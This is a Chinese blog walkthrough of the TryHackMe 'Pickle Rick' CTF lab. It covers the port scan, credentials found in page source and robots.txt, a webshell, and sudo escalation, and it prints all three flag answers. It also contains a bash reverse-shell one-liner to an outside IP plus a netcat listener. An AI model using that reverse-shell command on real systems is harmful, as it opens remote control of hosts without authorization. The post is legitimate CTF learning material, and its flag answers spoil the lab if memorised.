[Day9] THM Pickle Rick

今天来解的题目比较不是寻找公开 Exploit 的方式,而是要靠自己在网页上寻宝(?),来取得进一步的权限,也比较像 CTF 通灵的题目。

扫 Port

  • nmap -A 10.10.223.99
    • 22 port
    • 80 port

观察网页

  • 观察首页原始码
    • 提示 username : R1ckRul3s
  • 观察 robots.txt
    • Wubbalubbadubdub
    • 发现有一段可能是密码的字串(?)

Login

  • 在网址後面加上 /login.php 就可以进入登入
    • 使用 Username : R1ckRul3s
    • Password : Wubbalubbadubdub

Webshell

  • 进入後就是一个 webshell
    • 戳成 reverse shell
      • bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'
      • 本地端输入 nc -vlk 7877
      • 就能拿到 shell 了
  • Flag1
    • 在 web 目录
    • mr. meeseek hair
  • Flag2
    • 在 rick 家目录
    • 1 jerry tear
  • Flag3
    • 发现可以直接 sudo su
    • 所以就进 root 取得最後一个 flag
    • fleeb juice

<<:  图的连通 (4)

>>:  [Day9] Cloud SQL

[Day23] Angular 简介

呼~~终於写完所有躲在浏览器後面的东西了,现在我们已经架好了主机、布好了 API 程序、装好了 My...

用这9种技巧让你的部落格有个好名字

一、前言 经营部落格,会是一个长期的网路事业,在初期有许多部分我认为就应该思考好,在整个经营路上才...

【Day28】一些面试相关的题目

7年资深 iOS 开发工程师,5 道题全面考察候选人,看看你能过几招? 今天看到觉得好像蛮重要的,所...

DAY24: 作用域

既然提及了模块化,就来探讨一下作用域,在研读这段的时候, 原本觉得这没什麽,应该很好理解, 但我错了...

Day20 职训(机器学习与资料分析工程师培训班): 专题讨论

今日早上助教讲了一篇论文,主要是应用Yolo做图片辨识,下午则是各组别报告与该组专题相关的论文,及目...